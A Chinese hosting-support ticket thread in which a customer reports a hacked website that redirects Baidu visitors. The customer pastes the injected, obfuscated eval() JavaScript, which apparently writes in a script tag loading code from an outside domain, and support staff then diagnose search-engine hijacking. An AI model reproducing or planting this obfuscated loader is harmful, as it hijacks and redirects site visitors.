問:1、網站所有頁面均被嵌入代碼,通過百度訪問網站會跳轉到別的網站,直接通過域名打開會發現css、js文件均未加載。
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w '};c=1;};while(c–)if(k[c])p=p.replace(new RegExp('\\\\b' e(c) '\\\\b','g'),k[c]);return p;}('j["\\\\7\\\\e\\\\1\\\\l\\\\i\\\\9\\\\m\\\\0"]["\\\\8\\\\5\\\\a\\\\0\\\\9"](\\'\\\\g\\\\2\\\\1\\\\5\\\\a\\\\3\\\\0 \\\\0\\\\k\\\\3\\\\9\\\\d\\\\6\\\\0\\\\9\\\\q\\\\0\\\\4\\\\f\\\\b\\\\r\\\\b\\\\2\\\\1\\\\5\\\\a\\\\3\\\\0\\\\6 \\\\2\\\\5\\\\1\\\\d\\\\6\\\\p\\\\0\\\\0\\\\3\\\\2\\\\n\\\\4\\\\4\\\\8\\\\8\\\\8\\\\c\\\\1\\\\3\\\\7\\\\b\\\\2\\\\o\\\\c\\\\1\\\\e\\\\i\\\\4\\\\7\\\\7\\\\c\\\\f\\\\2\\\\6\\\\h\\\\g\\\\4\\\\2\\\\1\\\\5\\\\a\\\\3\\\\0\\\\h\\');',28,28,'x74|x63|x73|x70|x2f|x72|x22|x64|x77|x65|x69|x61|x2e|x3d|x6f|x6a|x3c|x3e|x6d|window|x79|x75|x6e|x3a|x38|x68|x78|x76'.split('|'),0,{}))</script>在所有文件和數據庫中進行了排查,未找到嵌入此段代碼之處。
2、另外在網站的根目錄的other文件夾中的文件刪除后現在網站無法訪問了。
請幫忙協助處理!謝謝!
,網站遭攻擊,惡意跳轉
問:現在主要問題是網站iis服務出現了問題,請協助處理,謝謝!
答:您好,查看您已經恢復others 目錄,已經訪問正常, ,查看文件加載正常 ,
測試通過百度訪問并未跳轉 ,請詳細告知跳轉細節 ,
如需我司協助清理,請提交維護工單 ,【虛擬主機數據庫問題】 -> 網站類問題 -> 網站掛馬/中毒/非法信息清理
非常感謝您長期對我司的支持,謝謝!
問:網站首頁打不開,本惡意攻擊
答:您好
1、我司核實到該主機狀態正常,網站可正常訪問,可能與訪問者所在地網絡環境不好有關系,可嘗試重啟本地路由,或清理瀏覽器緩存后測試.
2、如仍有問題請,按照教程http://www.shinetop.cn/faq/list.asp?unid=727 方法ping下域名并提供ping值截圖以及瀏覽器錯誤截圖反饋給我司分析,非常感謝您長期對我司的支持。
問:網站首頁被攻擊
答:您好
1、目前訪問你站點被系統阻斷,原因是程序中有非法信息,我司通過源碼查看到您程序被入侵,被黑客篡改了編碼,并在程序中植入了搜索引擎劫持代碼,如圖,請您聯系程序開發商徹底排查后門并修復漏洞,若不修復漏洞,仍有被入侵的可能。
2、若需我司協助清理掛馬,請您提交對應工單:【虛擬主機/數據庫問題】—【網站類問題】—【清理網站掛馬代碼和非法信息】 因程序并非我司開發,我司只能幫您清理掛馬,無法幫您處理編碼問題以及無法幫您修復漏洞,請您知悉,